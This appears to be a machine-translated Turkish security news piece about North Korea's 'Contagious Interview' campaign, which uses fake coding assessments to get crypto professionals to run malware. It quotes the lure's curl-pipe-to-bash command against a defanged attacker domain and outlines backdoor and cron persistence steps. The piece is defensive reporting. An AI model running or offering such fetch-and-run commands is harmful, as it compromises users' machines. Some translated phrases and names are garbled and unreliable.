Geçen yıl, siber güvenlik araştırmacıları, kripto para birimi endüstrisindeki profesyonelleri hedeflemek için askeri sınıf sosyal mühendislik tekniklerinden yararlanan Kuzey Kore tehdit aktörlerinin faaliyetlerinde bir artış gözlemlediler.
Bu kampanya, dublaj Bulaşıcı röportajsofistike kötü amaçlı yazılımların teslimatını maskeleyen aldatıcı bir şekilde iyi huylu bir iş başvurusu süreci kullanır.
Mağdurlar, hayali firmalardaki roller için sahte değerlendirmelere katılmak için davetiyeler alırlar, ancak kötü amaçlı senaryolar yürütülmeye teşvik edilir.
Saldırganlar geniş bir altyapı ağı tutar, hızla tehlikeye atılan alanların ve sunucuların yerini almak ve yüksek düzeyde katılım seviyelerini sürdürmek için.
2025’in başlarında, rakipler alan adlarını gibi isimlerle kaydetmeye başladılar. beceri[.]com Ve TalentCheck[.]profesyoneladayları sorun giderme hataları kisvesi altında kabuk komutlarını çalıştırmaya yönlendiren cazibe web sitelerinin ayarlanması.
Değerlendirme sırasında, kurbanları terminallerine kıvrılma komutunu yapıştırmaya yönlendiren bir sayfa içi hata-tipik olarak bir kamera erişim istemi-görünür.
Bu basit yük indirme adımı, kötü amaçlı yazılım kalıcı erişim oluşturduğundan ve kimlik bilgilerini açığa çıkardığı için hızla tam bir uzlaşmaya yükselir.
Bu adımların, özel alan adlarıyla birleştiğinde dikkatli bir şekilde düzenlenmesi, üç aylık bir süre içinde 230’dan fazla onaylanmış kurban katılımına yol açmıştır.
Sentinellabs analistleri, bu operasyonların ValidIn ve Virustotal gibi tehdit istihbarat platformlarının sürekli izlenmesi ile desteklendiğini belirtti.
Yeni Uzlaşma Göstergeleri (IOC’ler) Maltrail’in gibi depolarda yayınlanır. APT_LAZARUS[.]txtrakipler kendi altyapı maruziyetlerine ilişkin en son bilgilere sahip olduklarından emin olurlar.
Mevcut varlıklarda kapsamlı değişikliklere yatırım yapmak yerine, bir alan adı bozulmaya maruz kaldığında tamamen yeni sunucular oluşturmayı tercih ederler.
Bu stratejik seçim, kale tarzı savunmalar üzerindeki operasyonel çevikliği destekliyor ve aktörlerin yayından kaldırma taleplerinden bir adım önde kalmasını sağlıyor.
Sentinellabs araştırmacıları, altyapı değiştirme döngüsünün haftalar yerine saatler içinde ölçüldüğünü belirlediler.
Bir servis sağlayıcı bir etki alanını devre dışı bıraktığında, tehdit aktörleri derhal yeni bir etki alanı sağlar, kötü amaçlı yazılım dağıtım sunucularını taşır ve komut ve kontrol uç noktalarını günceller.
%20tracked%20as%20maintainer%20of%20cors-app%20and%20cors-parser%20(Source%20-%20Setinelone).webp)
Perde arkasında, koordinasyon, otomatik botların yeni alanların özetleri yayınladığı Slack gibi ekip işbirliği platformları ve bireysel operatörlerin bu önizlemeleri hızlı bir şekilde ardışık olarak tıkladığı takım işbirliği platformları aracılığıyla gerçekleşir.
Enfeksiyon mekanizması
Bulaşıcı görüşme kampanyasının merkezinde minimalist ama etkili bir enfeksiyon mekanizması yatmaktadır.
LURE sitesini ziyaret ettikten sonra, hedefler canlı bir kodlama değerlendirmesini simüle eden JavaScript ile çalışan bir formla karşılaşır.
Fabrikasyon hatayı tetiklediklerinde, sayfa bir terminal komutu görüntüler:-
curl - s https[:]//api[.]drive-release[.]cloud/update[.]sh | bashBu komutun yürütülmesi, çevre kontrolleri gerçekleştiren, kurbanın işletim sistemini algılayan ve özel bir yük indiren bir kabuk komut dosyası getirir.
Komut dosyası daha sonra hafif bir arka kapı yükler, kalıcılık için bir cron girişi yazar ve uzlaşmış ana bilgisayarın kaydedilmesi için aktör kontrollü C2 sunucusuyla HTTPS üzerinden iletişim kurar.
Tüm aşamalar bulaşmacı düğüm tarafından kaydedilir[.]Sunucuda JS uygulaması, JSON dosyalarında ayrıntılı mağdur kayıtları oluşturma gibi client_ips_start_test[.]JSON.
.webp)
Sosyal mühendislik ve otomatik komut dosyası karışımı, enfeksiyon oranlarını en üst düzeye çıkarırken, geliştirici çabalarını en aza indirerek DPRK saldırı yeteneklerinin olgunlaşmasını yansıtır.
Bu uyarlanabilir taktikler (Rapid altyapı cirosu, istihbarat odaklı varlık keşif ve aerodinamik yük teslimi) sayesinde, Kuzey Kore tehdit aktörleri dinamik ve kalıcı bir tehdit oluşturmaya devam ediyor.
Savunucular tespit protokollerini güçlendirdikçe, bu enfeksiyon mekanizmasını anlamak, ilk temastan önce saldırı zincirini bozmada çok önemlidir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.